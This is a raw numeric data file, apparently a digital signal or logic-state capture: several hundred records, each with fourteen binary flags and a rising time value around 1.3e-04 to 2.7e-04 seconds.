1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3255600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3258000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3260400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3263200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3266000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3268400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3270800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3273200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3275600e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3276400e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3280800e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3283200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3284000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3286000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3288400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3290800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3293200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3295600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3298000e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3298800e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3302800e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3305200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3306000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3308000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3310400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3313200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3315600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3318000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3320400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3322800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3325200e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3326000e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3328000e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3330400e-04 1,0,0,0,1,1,0,0,0,0,0,0,0,0,1.3330800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3331200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3333200e-04 1,0,0,0,1,0,0,0,0,1,0,0,0,0,1.3335600e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3336000e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3340400e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3342800e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3345200e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3348000e-04 1,0,0,0,1,1,0,0,0,0,0,0,0,0,1.3348400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3348800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3350400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3353200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3355600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3358000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3360400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3362800e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3363600e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3368000e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3370400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3371200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3373200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3375600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3378000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3380400e-04 1,0,0,0,1,0,0,0,0,1,0,0,0,0,1.3380800e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3381200e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3385600e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3388000e-04 1,0,0,0,1,1,0,0,0,0,0,0,0,0,1.3388400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3388800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3390400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3393200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3395600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3398000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3400400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3402800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3405200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3408000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3410400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3413200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3415600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3418000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3420400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3422800e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3423600e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3425200e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3428000e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3430400e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3433200e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3435600e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3438000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3438800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3442800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3445200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3448000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3450400e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3450800e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3455600e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3458000e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3460400e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3462800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3463600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3465200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3468000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3470400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3473200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3475600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3478000e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3478400e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3482800e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3485200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3486000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3488000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3490400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3493200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3495600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3498000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3500400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3502800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3505200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3508000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3510400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3513200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3515600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3518000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3520400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3522800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3525200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3528000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3530400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3533200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3535600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3538000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3540400e-04 1,0,0,0,1,0,0,0,0,1,0,0,0,0,1.3540800e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3541200e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3545600e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3548000e-04 1,0,0,0,1,1,0,0,0,0,0,0,0,0,1.3548400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3548800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3550400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3553200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3555600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3558000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3560400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3562800e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3563600e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3565200e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3568000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3568400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3573200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3575600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3580400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3582800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3585200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3588000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3590400e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3593200e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3595600e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3598000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3598800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3600400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3602800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3605200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3608000e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3608400e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3613200e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3615600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3616400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3618000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3620400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3622800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3625200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3628000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3630400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3633200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3635600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3638000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3640400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3642800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3645200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3648000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3650400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3653200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3655600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3658000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3660400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3662800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3665200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3668000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3670400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3673200e-04 1,0,0,0,1,0,0,0,0,1,0,0,0,0,1.3675600e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3676000e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3678000e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3680400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3681200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3685600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3688000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3693200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3695600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3698000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3700400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3702800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3705200e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3706000e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3708000e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3710400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3711200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3713200e-04 1,0,0,0,1,0,0,0,0,1,0,0,0,0,1.3715600e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3716000e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3720400e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3722800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3723600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3725200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3728000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3730800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3733200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3736000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3738800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3741200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3743600e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3744000e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3748800e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3750800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3752000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3753600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3756000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3758800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3761200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3763600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3766000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3768400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3770800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3773200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3776000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3778800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3781200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3783600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3786000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3788400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3790800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3793200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3796000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3798800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3801200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3803600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3806000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3808400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3810800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3813200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3816000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3818800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3821200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3823600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3826000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3828400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3830800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3833200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3836000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3838800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3841200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3843600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3846000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3848800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3851200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3854000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3856400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3858800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3861200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3863600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3866000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3868800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3871200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3874000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3876400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3878800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3881200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3883600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3886000e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3888800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3891200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3894000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3896400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3898800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3901200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3903600e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3906000e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3906800e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,1,2.6361200e-04 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.6378800e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.6380800e-04 0,1,0,0,1,1,0,0,0,1,0,1,0,1,2.6383600e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.6386000e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,1,2.6417200e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.6419600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.6420400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.6422000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.6424400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.6426800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.6429200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.6432000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.6434400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.6437200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.6439600e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.6442000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6444400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6446800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6449200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6452000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6454400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6457200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6459600e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6462000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6464400e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6465200e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6469600e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6472000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6472800e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6474800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6477200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6479600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6482000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6484400e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6486800e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6487600e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6492000e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6494800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6495200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6497200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6499600e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6502000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6504400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6506800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6509200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6512000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6514400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6517200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6519600e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6522000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6524400e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6525200e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6529600e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6532000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6532800e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6534800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6537200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6539600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6542000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6544400e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6546800e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6549200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6552000e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6552400e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6557200e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6559600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6560400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6562000e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6564400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6566800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6569200e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6570000e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6574800e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6577200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6578000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6579600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6582000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6584400e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6586800e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6589200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6592000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6594400e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6597200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6599600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6602000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6604400e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6606800e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6609200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6612000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6614400e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6617200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6619600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6622000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6624400e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6626800e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6627600e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6632000e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6634800e-04 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.6635200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6635600e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6637200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6639600e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6640000e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6644400e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6646800e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6647600e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6649200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6652000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6654400e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6657200e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6659600e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6662400e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6665200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6667600e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6668000e-04 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.6672800e-04 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.6675200e-04 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.6676000e-04 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.6678000e-04 